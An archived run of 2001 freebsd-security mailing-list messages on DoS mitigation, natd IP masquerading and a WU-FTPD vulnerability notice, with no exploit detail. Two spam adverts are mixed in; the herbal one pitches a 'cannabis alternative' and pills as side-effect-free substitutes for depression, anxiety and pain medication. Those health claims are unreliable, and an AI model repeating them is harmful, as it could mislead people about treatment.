Message-Id: <-5oxntUgLKwuAWr9.-5oxntUgLWksSYxk8I.-5oxntUgL8w47Dxr-.-F3L.-F3Qpi2NY.-FWEn4wH@> Subject: Interested in meeting.. new people? Reply-To: datersnet1201@yahoo.com Mime-Version: 1.0 Content-Type: text/html; charset="us-ascii" Date: Sun, 18 Nov 2001 17:33:22 To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Take control of your social life and join our community.
We offer a great way for busy, interesting and successful people to meet
each other in our safe, secure and anonymous environment.

Life should be wonderful. Find someone extraordinary to share your adventures with.
STOP waiting. START living.

GO meet Somebody!

CLICK HERE 


If you have received this message in error click here to be removed

 


To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 5:38:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.marriage.org (mail.learn4life.org [209.180.247.186]) by hub.freebsd.org (Postfix) with ESMTP id CAFB437B405; Mon, 19 Nov 2001 05:38:00 -0800 (PST) Received: from mail.bzznet.net (BULLFROG [209.134.34.20]) by proxy.marriage.org with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id W8B962ZZ; Mon, 19 Nov 2001 06:27:15 -0700 Message-ID: <00004e6d20bd$00001ff1$00006440@mail.bzznet.net> To: From: "Weedman" Subject: NEW SMOKING BLENDS! Date: Mon, 19 Nov 2001 21:18:04 -2000 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Now Offering for your "Sensitive" Delight ... NEW & IMPROVED *** KATHMANDU 2 *** Thanks to recent dramatic advances in the laboratorial processes for the extraction of botanical/herbal alkaloids and glycocides, we are now able to offer what has already been the most incredibly potent marijuana/cannabis alternative available on the planet .... KATHMANDU TEMPLE KIFF!!! It is NEW, IMPROVED and 20 times more stokin'-tokin' potent in its formulation. KATHMANDU 2 ... a viripotent cannabis alternative for blissful regressions of vexatious depressions... * BURNS AND SMOKES EASIER! * TOKES DEEPER! * TASTES SWEETER! * LASTS LONGER! Kathmandu Temple Kiff is a proprietary; Nepalese, sensitive, pipe-smoking/stoking substance. Kathmandu Temple Kiff is indeed the most substantial marijuana/cannabis alternative on the planet. Absolutely Legal! Marvelously Potent! Kathmandu Temple Kiff possesses all of the positive virtues fine ganja/cannabis without any of the negatives. An amalgamation of high concentrates of rare euphoric herbas, Kathmandu is offered in a solid jigget/bar format and is actually more UPLIFTING & POISED than cannabis / marijuana while rendering Euphoria, Happiness, Mood-Enhancement, Stress/Depression Relief and promoting contemplativeness, creativity, better sleep, lucid dreaming ... and enhancing the sexual experience!!! Kathmandu Temple Kiff is simply the best and just a little pinch/snippet of the Kathmandu goes a long, "sensitive" way. Just 4 or 5 draws of the pipe ... (an herb pipe included with each package of Kathmandu Temple Kiff). PLEASE NOTE: Although no botanical factor in Kathmandu Temple Kiff is illegal or considered to be harmful by regulatory agencies and no tobacco is included therein, it is the policy of our company that Kathmandu Temple Kiff may not be offered or sold to any person that has not attained at least 21 years of age. So power-smokin potent is our new formulation, that much to our delight and actually even to our amazement, we have even be able to establish a very happy clientele within the hard core stoner market. Here is what our customers are saying about Kathmandu Temple Kiff: "Thank you so much for the Temple Kiff. It is everything you guys claim, and then some! I was a bit skeptical when I read your description of its effects, but there is literally no exaggeration in your advertisements. How nice that this is legal! It tastes great and feels great too! I am so glad I took a chance and ordered. Blessings to all of you." -- Frankie R. "I'm a man of my 40's and I really know my stuff. I don't drink or do illegal drugs anymore and have found a much more spiritual path. I used to have to take Valium in the past. Not anymore with the Temple Kiff. It really amazes me how this stuff tastes exactly like the lebanese red and blond hash I used to smoke in the 70's and it has a much more pleasurable effect. I am very satisfied with this product. I like it a lot and will be a customer for life for sure. Whoever makes this stuff is an ARTIST at it. Who would have thought?! Folks, this is the real stuff! Look no further!!" -- A.J. ************************************************************ Our other fine herbal, botanical products include the following: 1. Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN. 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant... 4. Extreme Martial Arts Botanical Remedies; Equivalence Tablets & Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers... ********************************************* Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances: * Penile & clitoral sensitivity * Sensitivity to touch * Desire to touch and be touched * Fantasy, lust, rapture, erogenous sensitivity ... * Prolongs and intensifies foreplay, orgasm & climax ********************************************* "Seventh Heaven" Prosaka Tablets ... Entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc. NO side effects! NO dependency! Vivaciously Mellow! ********************************************** "Seventh Heaven" Gentle Ferocity Tablets (tm) ... a non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit. This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition. These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective. Enjoy! For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!! Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite! *********************************************** Extreme Martial Arts Botanical Remedies Eastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions. We are pleased to offer Equivalence Tablets & Dragon Wing Remedy Spray (Hei Ping Shun) (Hei Long Chibang) PLEASE NOTE: While it is true that all physiological traumas and injuries are unique and that no product can arbitrarily eliminate all of the pain and discomfort in all people all of the time, the combination of Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy (Hei Long Chibang) remedial botanicals does guarantee to at the least: 1. Significantly reduce discomfort and pain! (In many instances most, if not all, traumas and distress can be eliminated!) 2. Significantly increase mobility and strength ratio. (Please remember also the significance of proper diet, excercise, rest and prayer.) Equivalence Tablets & Dragon Wing Spray Remedials are comprised of entirely natural botanical factors. While Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy Spray (Hei Long Chibang) are extremely effective individually, they are utilized to maximum advantage when used in conjunction with one another. ======================================================== PRICING INFORMATION: 1. SEVENTH HEAVEN KATHMANDU TEMPLE KIFF (tm) One .75 oz. jigget/bar $65.00 One 2.0 oz. jigget/bar $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text) 2. SWEET VJESTIKA APHRODISIA DROPS (tm) One 1.0 oz. bottle $90.00 Two 1.0 oz. bottles $140.00 3. SEVENTH HEAVEN PROSAKA (tm) One 100 tablet tin $40.00 Three 100 tablet tins $105.00 Six 100 tablet tins $185.00 4. SEVENTH HEAVEN GENTLE FEROCITY (tm) One 300 tablet jar $130.00 5. Equivalence Tablets - Each bottle contains 90 - 500mg tablets. ** 3-pack (270 tablets) $83.00 ** 6-pack (540 tablets) $126.00 (save $40.00) ** 9-pack (810 tablets) $159.00 (save $90.00) ** 12-pack (1,080 tablets) $192.00 (save $140.00) 6. Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz. ** 3-pack (3 - 4 oz. bottles) $83.00 ** 6-pack (6 - 4 oz. bottles) $126.00 (save $40.00) ** 9-pack (9 - 4 oz. bottles) $159.00 (save $90.00) ** 12-pack (12 - 4 oz. bottles) $192.00 (save $140.00) 7. Dynamic Duo Introductory Offers ** 3-pack Equivalence Tabs & 3-pack Dragon Wing $126.00 (save $40.00) ** 6-pack Equivalence Tabs & 3-pack Dragon Wing $159.00 (save $50.00) ** 9-pack Equivalence Tabs & 6-pack Dragon Wing $215.00 (save $70.00) ** 12-pack Equivalence Tabs & 9-pack Dragon Wing $271.00 (save $80.00) 8. SWEET APHRODISIA INTRO COMBINATION OFFER Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff & one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops. For $150.00 (Reg. $205.00 Save $55) (Free Capillaris Herba with this intro offer. Refer to Capillaris paragraph at end of text) 9. BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff & 1 tin (100 tablets) of Seventh Heaven Prosaka. For $125.00 (Reg. $155.00 Save $30) (Free Capillaris Herba with this intro offer. Refer to Capillaris paragraph at end of text) 10. "PURE ENERGY" INTRO COMBINATION OFFER Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff & 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity. For $170.00 (Reg. $245.00 Save $75) (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text) 11. "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff & 1 tin (100 tablets) of Seventh Heaven Prosaka & 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00 Save $85) (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.) 12. ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER Includes one - 2.0 oz. jigget / bar of Kathmandu Temple Kiff, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00 Save $115) (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.) SPECIAL OFFER: For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you. This hookah has a retail value of $25.00. ************************************************** ORDERING INFORMATION: For your convenience, you can call us direct with your orders or questions. Call 1-623-974-2295 Monday - Friday -- 10:30 AM to 7:00 PM (Mountain Time) Saturday -- 11:00 AM to 3:00 PM (Mountain Time) For all domestic orders, add $5.00 shipping & handling (shipped U.S. Priority Mail). Add $20.00 for International orders. ************************************************** SPECIAL DISCOUNT & GIFT Call now and receive a FREE botanical gift! With every order for a 2.0 oz. jigget / bar of Kathmandu Temple Kiff or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value). ==================================================== To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 5:52:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from anarkey.org (node10412.a2000.nl [24.132.4.18]) by hub.freebsd.org (Postfix) with ESMTP id 9482437B416 for ; Mon, 19 Nov 2001 05:52:34 -0800 (PST) Received: (from nobody@localhost) by anarkey.org (8.11.6/8.11.6) id fAJDi4K13642; Mon, 19 Nov 2001 14:44:04 +0100 (CET) (envelope-from eye@olger.org) Date: Mon, 19 Nov 2001 14:44:04 +0100 (CET) Message-Id: <200111191344.fAJDi4K13642@anarkey.org> From: "eye" To: freebsd-security@freebsd.org Subject: unsubscribe X-Mailer: Anarkey X-OriginatingIP: 192.168.0.11 (olger) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 8:13:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id 730E137B405 for ; Mon, 19 Nov 2001 08:13:31 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 165r2x-0002oa-00; Mon, 19 Nov 2001 16:13:23 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Mon, 19 Nov 2001 16:13:23 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C58516989@MAGRAT> From: Lee Brotherston To: 'xmen koh' , freebsd-security@FreeBSD.ORG Subject: RE: How to stop DoS Attack?? Date: Mon, 19 Nov 2001 16:13:22 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | Recently I got a DoS on my web server. Does anyone | know how to | stop a DoS attack and prevent it from happen again? | Some help | will be appreciated to explain the below TCPDump which | I got | during the attack. When you encounter a DoS or DDoS, what can be done is largely based on the type of DoS. If it tries to use up resources of a machine my constantly requesting come processor intensive cgi on a webserver for example then some firewalling will probably suffice. If however it is the kind of attack which is designed to take up network resources, then it is a different matter. DoS's that saturate lines are seldom solved with firewalling at your end, as the likelihood is that your connection is probably already saturated by the time it reaches your firewall. The best course of action is to gather as much information as possible, and to try to get in touch with your ISP or upstream provider. Depending on their internal policies etc, they may be able to add some filters in the router that provides your connectivity, maybe even at their borders if the DoS can be traced to peering points etc. Having done this then you can attempt to get in contact with the administrators of the systems that are attacking you, and/or their upstreams in order to raise an abuse complaint, if it is relevant. Hope it's of some use Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 15:12:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.in.nextra.sk (mail.in.nextra.sk [195.168.1.55]) by hub.freebsd.org (Postfix) with SMTP id 88BED37B405 for ; Mon, 19 Nov 2001 15:12:26 -0800 (PST) Received: (qmail 14864 invoked by uid 85); 19 Nov 2001 23:12:16 -0000 Received: from egresh@noc.nextra.sk by mail.in.nextra.sk with qmail-scanner-0.96 (. Clean. Processed in 0.338312 secs); 19 Nov 2001 23:12:16 -0000 Received: from unknown (HELO noc.nextra.sk) (195.168.29.2) by mail.in.nextra.sk with SMTP; 19 Nov 2001 23:12:16 -0000 Message-ID: <3BF991E3.5483C14F@noc.nextra.sk> Date: Tue, 20 Nov 2001 00:12:35 +0100 From: Tibor Gres Reply-To: egresh@noc.nextra.sk Organization: Nextra s r.o. X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: sk, en MIME-Version: 1.0 To: Matiss Elsbergs Cc: freebsd-security@freebsd.org Subject: Re: IP Masquerade References: <3BF65250.6E0B8F2E@softnet.ro> <001701c16f8e$4b02d300$0300a8c0@weird> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org /etc/rc.conf: .. natd_enable="YES" natd_interface="fxp0" #what interface you have.. natd_flags="-s -u" #-use_sockets | -s # Allocate a socket(2) in order to establish an FTP data or IRC # DCC send connection. This option uses more system resources, # but guarantees successful connections when port numbers con- # flict. #-unregistered_only | -u # Only alter outgoing packets with an unregistered source # address. According to RFC 1918, unregistered source # addresses are 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16. firewall_script="/etc/rc.fw" .. /etc/rc.fw: .. add 200 divert natd ip from any to any via fxp0 .. man ipfw man natd Matiss Elsbergs wrote: > > man natd > ----- Original Message ----- > From: "Florin MANAILA" > To: "FreeBSD" > Sent: Saturday, November 17, 2001 2:04 PM > Subject: IP Masquerade > > > Hi all, > > how do I make IP Masquerade on a FreeBSD whit ipfw for > > 192.168.1.0/24 to be able to communicate with the global > > Internet ? > > > > > > Best regards, > > Florin > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Tibor Gres e-mail: egresh@noc.nextra.sk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 20: 1:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id BB59137B418 for ; Mon, 19 Nov 2001 20:01:48 -0800 (PST) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12183; Mon, 19 Nov 2001 21:01:28 -0700 (MST) Message-Id: <4.3.2.7.2.20011119180925.0448a420@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 19 Nov 2001 18:10:40 -0700 To: "Matiss Elsbergs" , "Florin MANAILA" From: Brett Glass Subject: Re: IP Masquerade Cc: In-Reply-To: <001701c16f8e$4b02d300$0300a8c0@weird> References: <3BF65250.6E0B8F2E@softnet.ro> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:35 AM 11/17/2001, Matiss Elsbergs wrote: >man natd Alas, that man page really doesn't go through all the steps. I've been thinking of writing a HOWTO, since I've helped so many puzzled people get through this. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 20:38:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from gramsc1.dyndns.org (h00609774e769.ne.mediaone.net [24.91.224.187]) by hub.freebsd.org (Postfix) with ESMTP id 0ACE837B405 for ; Mon, 19 Nov 2001 20:38:09 -0800 (PST) Received: from gramsc1.dyndns.org (xfedwigk@localhost.net [127.0.0.1]) by gramsc1.dyndns.org (8.12.1/8.12.1) with ESMTP id fAK4c2BH021471; Mon, 19 Nov 2001 23:38:02 -0500 (EST)?g (envelope-from resopmok@gramsc1.dyndns.org)œ Received: from localhost (resopmok@localhost) by gramsc1.dyndns.org (8.12.1/8.12.1/Submit) with ESMTP id fAK4c1D6021468; Mon, 19 Nov 2001 23:38:01 -0500 (EST)?g (envelope-from resopmok@gramsc1.dyndns.org) Date: Mon, 19 Nov 2001 23:38:01 -0500 (EST) From: Chris Thomas To: Brett Glass Cc: Matiss Elsbergs , Florin MANAILA , Subject: Re: IP Masquerade In-Reply-To: <4.3.2.7.2.20011119180925.0448a420@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org this is off-topic for this list, and the handbook has very good instructions (www.freebsd.org/handbook, section 17.11). it's be great if this were the last message on this topic. k? -chris On Mon, 19 Nov 2001, Brett Glass wrote: > At 10:35 AM 11/17/2001, Matiss Elsbergs wrote: > > >man natd > > Alas, that man page really doesn't go through all the steps. I've been > thinking of writing a HOWTO, since I've helped so many puzzled people get > through this. > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 19 23: 3:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from cyberlib.itb.ac.id (cyberlib.itb.ac.id [167.205.4.25]) by hub.freebsd.org (Postfix) with SMTP id 27C8537B405 for ; Mon, 19 Nov 2001 23:03:23 -0800 (PST) Received: (qmail 91775 invoked by uid 1223); 20 Nov 2001 07:10:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Nov 2001 07:10:05 -0000 Date: Tue, 20 Nov 2001 14:10:05 +0700 (JAVT) From: Hotben Sinaga To: Mike Tancsa Cc: Kris Kennaway , security@freebsd.org Subject: Re: FreeBSD remote root exploit ? In-Reply-To: <5.1.0.14.0.20010719010646.03e25eb8@192.168.0.12> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org do you know about torbo assembler, if you do please help me to solve my problem........ thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:35:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id A9C6937B416 for ; Tue, 20 Nov 2001 06:35:38 -0800 (PST) Received: from simoeon.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by smtp1.sentex.ca (8.11.6/8.11.6) with ESMTP id fAKEZcZ20878 for ; Tue, 20 Nov 2001 09:35:38 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20011120092809.03876160@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 09:29:00 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: Vendors For WU-FTPD Please Read Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What would be a good alternative to WU-FTPD that allows safe one way uploads ? ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Date: Mon, 19 Nov 2001 12:49:47 -0700 (MST) >From: Vulnerability Help >To: >Subject: Vendors For WU-FTPD Please Read >X-Virus-Scanned: by AMaViS perl-10 > > > >Heya all, > >The SecurityFocus Vulnerability Help Team is in the process of notifying >vendors of a remotely exploitable problem in WU-FTPD . Rather than miss >any vendors we are asking vendors which read Bugtraq and ship WU-FTPD >either as a default package or a ports package to please mail us your >relevant security contact information (with a PGP key please). The WU-FTPD >has been notified already. > >Cheers, > >SecurityFocus >Vulnerability Help Team -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:42:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id 1A32437B41A for ; Tue, 20 Nov 2001 06:42:21 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA01811; Tue, 20 Nov 2001 09:43:25 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02842; Tue, 20 Nov 2001 09:42:20 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 09:42:20 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <5.1.0.14.0.20011120092809.03876160@marble.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Mike Tancsa wrote: > What would be a good alternative to WU-FTPD that allows safe one way uploads ? www.proftpd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 6:55:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ccmr.cornell.edu (mercury.ccmr.cornell.edu [128.84.231.97]) by hub.freebsd.org (Postfix) with ESMTP id E536537B417 for ; Tue, 20 Nov 2001 06:55:04 -0800 (PST) Received: from ruby.ccmr.cornell.edu (IDENT:0@ruby.ccmr.cornell.edu [128.84.231.115]) by mercury.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02116; Tue, 20 Nov 2001 09:56:09 -0500 Received: from localhost (mitch@localhost) by ruby.ccmr.cornell.edu (8.9.3/8.9.3) with ESMTP id JAA02895; Tue, 20 Nov 2001 09:55:04 -0500 X-Authentication-Warning: ruby.ccmr.cornell.edu: mitch owned process doing -bs Date: Tue, 20 Nov 2001 09:55:04 -0500 (EST) From: Mitch Collinsworth X-Sender: mitch@ruby.ccmr.cornell.edu To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 20 Nov 2001, Mike Tancsa wrote: > It too seems to be vulnerable to various security holes in the recent and > not so recent past :-( Name one thing that hasn't been. The real issue, IMO, is not having never had a security bug, but how quickly bugs are fixed and how easy it is to apply the fixes. -Mitch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7: 6:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from softhome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with ESMTP id 5D73837B418 for ; Tue, 20 Nov 2001 07:06:48 -0800 (PST) Received: from 192.168.44.91 ([213.86.145.226]) (AUTH: PLAIN robsd@softhome.net) by softhome.net with esmtp; Tue, 20 Nov 2001 07:57:44 -0700 Date: Tue, 20 Nov 2001 15:09:17 +0000 From: RoBSD X-Mailer: The Bat! (v1.53d) Reply-To: RoBSD Organization: RoBSD X-Priority: 3 (Normal) Message-ID: <722713532.20011120150917@softhome.net> To: Mitch Collinsworth Cc: security@FreeBSD.ORG Subject: Re[2]: Fwd: Vendors For WU-FTPD Please Read In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org www.pureftpd.org MC> On Tue, 20 Nov 2001, Mike Tancsa wrote: >> What would be a good alternative to WU-FTPD that allows safe one way uploads ? MC> www.proftpd.org MC> To Unsubscribe: send mail to majordomo@FreeBSD.org MC> with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 20 7:17:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 9BF2037B417 for ; Tue, 20 Nov 2001 07:17:09 -0800 (PST) Received: from simoeon.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by smtp1.sentex.ca (8.11.6/8.11.6) with ESMTP id fAKFH7g27151; Tue, 20 Nov 2001 10:17:07 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20011120095853.038e9280@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 20 Nov 2001 10:10:29 -0500 To: Mitch Collinsworth From: Mike Tancsa Subject: Re: Fwd: Vendors For WU-FTPD Please Read Cc: security@FreeBSD.ORG In-Reply-To: References: <5.1.0.14.0.20011120093740.038e2580@marble.sentex.ca> 